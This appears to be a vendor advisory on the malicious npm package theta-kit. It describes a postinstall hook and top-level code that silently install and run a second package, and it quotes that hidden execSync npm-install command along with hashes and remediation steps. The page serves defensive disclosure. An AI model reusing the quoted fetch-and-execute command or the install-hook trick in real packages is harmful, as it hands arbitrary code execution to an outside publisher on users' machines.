Malicious package

theta-kit (npm)

Malicious code in theta-kit (npm)
Remove it immediately and rotate any exposed credentials.

MAL-2026-5706
Immediate action
Remove the package, then rotate any secrets the install or runtime environment could reach: environment variables, CI and registry tokens, and credential files in the working tree. Also check node_modules for theta-connector, the package the fallback pulls in with --no-save; because of that flag it is never written to package.json or the lockfile and shows up only on disk.
npm uninstall theta-kit

What this malware does

package.json declares postinstall: node dist/index.js, and dist/index.js calls Model.resetor() at module top level, so both npm install theta-kit and require('theta-kit') hand control to a separate package, 'theta-connector'. resetor() instantiates new ThetaConnector({}) and calls db.queryDBConnect(). If 'theta-connector' is not present, the catch branch silently runs execSync('npm install theta-connector --no-warnings --no-save --no-progress --loglevel silent') and then requires and executes it.

The code that ultimately runs is not shipped in this tarball, so its bytes can change at any time without any update to theta-kit. Output is suppressed and errors are swallowed, hiding the fetch-and-execute from the installer. The --no-save flag keeps theta-connector out of package.json and the lockfile, so a lockfile audit will not see it; only an inspection of node_modules on disk will.

The package also declares a runtime dependency on child_process@^1.0.2, an unrelated registry placeholder that shares a name with Node's built-in module. require('child_process') always resolves to the core module, so the dependency serves no functional purpose; it is a confusion pattern that adds a second publisher-controlled execution surface to every install.

The install-time fetch-and-execute, the silent self-install fallback and the unrelated 'child_process' registry dependency have nothing to do with the package's advertised purpose (a mobx in-memory DB), and together they give the maintainer of 'theta-connector' arbitrary code execution on every install or require of theta-kit.

Malicious versions

4 flagged: 1.0.0, 1.0.1, 1.0.2, 1.0.3

Indicators of compromise (SHA-256)

09b0737ff5b0b0768e2314b014529b80609632a38dfdc3a9ad6cfd6ab1da9039
30f04104c9e5de8a18da769a2aa50e78546b12ccaf99d7c442aae79277c6e098
4f2b7b976965370ad873f7410cd353a71da0cdbe5d86dcf23a537dab34b98959
8e4af06adb727e8855bb93b3d39906e1aa504a697641cfecad7fbf51dd8e024b
eaf5ecef46a2c9c55015a7ce1b2cbd6fbe4cc2305fb2113c4889b11b26a7231e
f7f4a3e8761d93c4408de9acaf0eee18f4f0146cbef2638669054a4c19beae4b

Frequently asked questions

Is theta-kit safe to use?

No. theta-kit on npm has been identified as a malicious package (versions 1.0.0, 1.0.1, 1.0.2 and 1.0.3 are flagged). Remove it immediately; do not install it or keep it in your dependency tree.

Campaign

IN-MAL-2026-006013
IN-MAL-2026-006026
IN-MAL-2026-006014
IN-MAL-2026-006021
IN-MAL-2026-006015
IN-MAL-2026-006025

Credits

  • Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

theta-kit (npm) malicious package — MAL-2026-5706 | O3 Security